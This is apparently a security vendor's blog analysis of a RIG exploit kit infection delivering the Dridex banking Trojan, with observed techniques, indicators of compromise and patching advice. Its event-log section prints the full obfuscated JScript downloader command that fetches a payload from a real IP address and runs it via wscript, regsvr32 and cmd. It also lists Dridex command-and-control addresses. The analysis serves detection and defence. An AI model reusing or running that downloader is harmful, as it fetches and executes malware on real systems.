The RIG Exploit Kit (EK), which was discovered in 2014, is known to exploit vulnerabilities in Microsoft’s Internet Explorer browser and third-party applications such as Java, Adobe Flash, and Microsoft Silverlight. Browser exploits are very rare nowadays, however, in March 2021 researchers discovered the Rig EK had the ability to exploit CVE-2021-26411 affecting Microsoft Internet Explorer.
Dridex is known as a banking Trojan which has the ability to steal banking credentials and other personal information to gain access to financial records. Recently, a researcher @nao_sec, discovered Dridex had switched its host-based infection techniques to bypass security and anti-virus vendor protections.
OpenText consistently researches how exploit kits and other malware affect and interact with the endpoint for the best detection techniques. Below is an example of the tactic, techniques, and procedures (TTP’s) OpenText observed during a recent RIG exploit and Dridex Trojan infection.
Initial infection chain – redirect to the RIG EK:
Shown above: Malicious domain using HTTP 302 to redirect to the RIG EK landing page
Shown above: IP address and URI string hosting the RIG EK along with partial exploit code
Shown above: Iexplore.exe interacting with cmd.exe to run the post exploit script
Shown above: Cmd.exe executing the dropped Dridex payload in the Local Temp directory to start the Dridex Trojan after the exploit
Shown above: Initial Dridex payload displaying the binary meta data
Shown above: Persistence is achieved via the creation of a Scheduled Task set to run at start-up and every 30 minutes.
Shown above: Dridex uses DLL (Dynamic Link Library) hijacking and process hollowing which moves malicious DLL and legitimate Windows binaries into the Local Temp or Roaming directories.
Shown above: Dridex Trojan IP and SSL Certificate seen during the process hollowing of Windows process spoolsv.exe
Tactic, Techniques, and Procedures (TTP’s) observed during infection:
- Windows event logs showing associated processes and commandline
ParentProcessName C:\Program Files (x86)\Internet Explorer\iexplore.exe
CommandLine cmd.exe /q /c cd /d “%tmp%” && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y[“set”+”Proxy”](n);y.open(“GET”,k(1),1);y.Option(n)=k(2);y.send();y/*XASX1ASXASS*/[“Wait”+”ForResponse”]();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e[“cha”+”rCodeAt”](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join(“”)};try{var u=WScript.Echo(),o=”Object”,A=Math,a=Function(“b”,”return WScript.Create”+o+”(b)”);P=(“”+WScript).split(” “)[1],M=”indexOf”,q=a(P+”ing.FileSystem”+o),m=WScript.Arguments,e=”WinHTTP”,Z=”cmd”,Q=a(“WinH”+”ttp.WinHttpRequest.5.1”),j=a(“W”+P+”.Shell”),s=a(“ADODB.Stream”),x=O(8)+”.”,p=”exe”,n=0,K=WScript[P+”FullName”],E=”.”+p;Y=”Type”;s[Y]=2;s.Charset=”iso-8859-1″;s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M](“PE\x00\x00″));s.WriteText(v);if(32-1^<d){var z=1;x+=”dll”}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x=”regsvr”+32+E+” /s “+x);j.run(Z+E+” /c “+x,0)}catch(xXASXASSAA){};q.Deletefile(K);>3.tMp && stArt wsCripT //B //E:JScript 3.tMp “hj4ZytE5dZgd” “https://45.138.26.82/?MzkyNDk4&okTsKzUug&oa1n4=x33QcvWYaRuPCYjEM_jdSqRGPkzVGViIxo&s2ht4=2fn7DSHp2meCij07CeEAL3sF6WSR7V6vd-Ke1Tfwe0jiqDOQE4n9leTF5T8_GqzkLlyhKYhZOF-RaJYglH-5aRR7Vv3A72m7VFdMkjlRLU7WVTy-lJUVoT6Q4RmKnIEKWbrkJzB0FnVQvKKJojpUjGVyTYMjJwgfSLQ2Z22-3N8sc&kUTwcVNTgyNQ==” “2”” NewProcessName C:\Windows\SysWOW64\cmd.exe
ParentProcessName C:\Windows\SysWOW64\cmd.exe
CommandLine wsCripT //B //E:JScript 3.tMp “hj4ZytE5dZgd” “https://45.138.26.82/?MzkyNDk4&okTsKzUug&oa1n4=x33QcvWYaRuPCYjEM_jdSqRGPkzVGViIxo&s2ht4=2fn7DSHp2meCij07CeEAL3sF6WSR7V6vd-Ke1Tfwe0jiqDOQE4n9leTF5T8_GqzkLlyhKYhZOF-RaJYglH-5aRR7Vv3A72m7VFdMkjlRLU7WVTy-lJUVoT6Q4RmKnIEKWbrkJzB0FnVQvKKJojpUjGVyTYMjJwgfSLQ2Z22-3N8sc&kUTwcVNTgyNQ==” “2”” NewProcessName C:\Windows\SysWOW64\wscript.exe
ParentProcessName C:\Windows\SysWOW64\wscript.exe
CommandLine “C:\Windows\System32\cmd.exe” /c y0xyn.exe
NewProcessName C:\Windows\SysWOW64\cmd.exe
ParentProcessName C:\Windows\SysWOW64\cmd.exe
CommandLine y0xyn.exe
NewProcessName C:\Users\ROBERT~1.TOM\AppData\Local\Temp\y0xyn.exe
ParentProcessName C:\Users\ROBERT~1.TOM\AppData\Local\Temp\y0xyn.exe
CommandLine C:\Windows\system32\schtasks.exe /run /tn “Xjewnuamckmuzcr”
NewProcessName C:\Windows\System32\schtasks.exe
- Windows binaries observed being moved during DLL hijacking process:
Parent Process: Explorer.exe
Path: C:\Users\[REDACTED]\AppData\Local\Tde\cmstp.exe
Path: C:\Users\[REDACTED]\AppData\Local\yth\Utilman.exe
Path: C:\Users\[REDACTED]\AppData\Local\9sXuqoY\cttune.exe
Path: C:\Users\[REDACTED]\AppData\Local\0sLDUDyo\wermgr.exe
Path: C:\Users\[REDACTED]\AppData\Local\xIjxwZ\msinfo32.exe
Path: C:\Users\[REDACTED]\AppData\Local\HBzY3Lo4\ddodiag.exe
Path: C:\Users\[REDACTED]\AppData\Roaming\Jhbyypvl\dvdupgrd.exe
Path: C:\Users\[REDACTED]\AppData\Local\LCffUor\StikyNot.exe
Path: C:\Users\[REDACTED]\AppData\Local\AqPAr1p0\bcastdvr.exe
Path: C:\Users\[REDACTED]\AppData\Local\hyWpwjovS\SysResetErr.exe
Path: C:\Users\[REDACTED]\AppData\Local\2eYtH4\LockScreenContentServer.exe
Path: C:\Users\[REDACTED]\AppData\Local\9I16g\AtBroker.exe
Path: C:\Users\[REDACTED]\AppData\Local\dlIR8aEB3\phoneactivate.exe
Path: C:\Users\[REDACTED]\AppData\Local\gHias\Dxpserver.exe
Path: C:\Users\[REDACTED]\AppData\Local\hpb1TE9\wextract.exe
Path: C:\Users\[REDACTED]\AppData\Local\w4eFILY3X\msdt.exe
Path: C:\Users\[REDACTED]\AppData\Local\qYd59E7v\CameraSettingsUIHost.exe
Path: C:\Users\[REDACTED]\AppData\Local\WWTL\isoburn.exe
Path: C:\Users\[REDACTED]\AppData\Local\AgNcSv4BT\bcastdvr.exe
Path: C:\Users\[REDACTED]\AppData\Local\WwQHiF3\RdpSaUacHelper.exe
Path: C:\Users\[REDACTED]\AppData\Local\pTBOO\rdpclip.exe
- Process hollowing observed used to communicate with the Command and Control (C2):
Parent Process: Explorer.exe
Process Path: C:\Windows\system32\spoolsv.exe
Process CommandLine: C:\Windows\system32\spoolsv.exe
Parent Process: Explorer.exe
Process Path: C:\Windows\System32\svchost.exe
Process CommandLine: C:\Windows\System32\svchost.exe (NOTE: NO -k in the CommandLine)
Indicators of compromise:
Rig EK:
ankltrafficexit.xyz/trafficexit – Redirect Domain to Rig EK landing page
45.138.26.82 – IP Hosting Rig EK
IP Addresses and Ports Associated with the Dridex Trojan C2:
156.253.5.151 Port 443
136.243.194.22 Port 443
84.232.252.62 Port 443
77.201.73.52 Port 8443
51.195.18.83 Port 448
89.215.165.36 Port 8443
45.145.55.170 Port 443
164.155.66.30 Port 4143
205.185.113.183 Port 443
88.132.150.82 Port 443
Dridex Trojan binary and associated hash:
y0xyn.exe – Initial Dridex binary dropped by Rig EK
SHA-256 hash: e63628e1ea625d9363bd76e38a225fb78b4b70114ab97ee43b02b0fd68fc7176
Link to Dridex Trojan binary for validation purposes.
If organizations are concerned they have been effected by the Rig EK, OpenText would recommend the following actions are taken:
- Ensure browsers and plugins are up to date and patched
- Enable Protected Mode within Microsoft Internet Explorer browser
The OpenText Security Services team uses their extensive experience to identify an organization’s security risks and work with them to keep systems protected, offering multiple services to address cyber security and privacy objectives. Contact us for more information.
Author: Lenny Conway, Lead Consultant
